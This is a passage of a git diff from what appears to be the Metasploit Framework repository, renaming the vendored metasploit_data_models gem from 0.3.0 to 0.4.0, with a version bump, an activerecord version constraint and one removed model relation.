a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb similarity index 98% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb index 8105105ee0..2d40a5f749 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb @@ -15,7 +15,6 @@ class Mdm::Workspace < ActiveRecord::Base # Relations # - has_many :cred_files, :dependent => :destroy, :class_name => 'Mdm::CredFile' has_many :creds, :through => :services, :class_name => 'Mdm::Cred' has_many :events, :class_name => 'Mdm::Event' has_many :hosts, :dependent => :destroy, :class_name => 'Mdm::Host' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/console_db.yml rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/engine.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb similarity index 95% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb index e68300cf0c..cf7d89cc68 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb @@ -3,5 +3,5 @@ module MetasploitDataModels # is considered unstable because the database migrations are still in metasploit-framework and certain models may not # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API # the version should remain below 1.0.0 - VERSION = '0.3.0' + VERSION = '0.4.0' end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec similarity index 94% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec index 3a26fb1312..ec0d9dd672 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec @@ -19,7 +19,7 @@ Gem::Specification.new do |s| # ---- Dependencies ---- s.add_development_dependency 'rake' - s.add_runtime_dependency 'activerecord' + s.add_runtime_dependency 'activerecord', '>= 3.2.10' s.add_runtime_dependency 'activesupport' s.add_runtime_dependency 'pg' s.add_runtime_dependency 'pry' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/javascripts/application.js rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb rename to 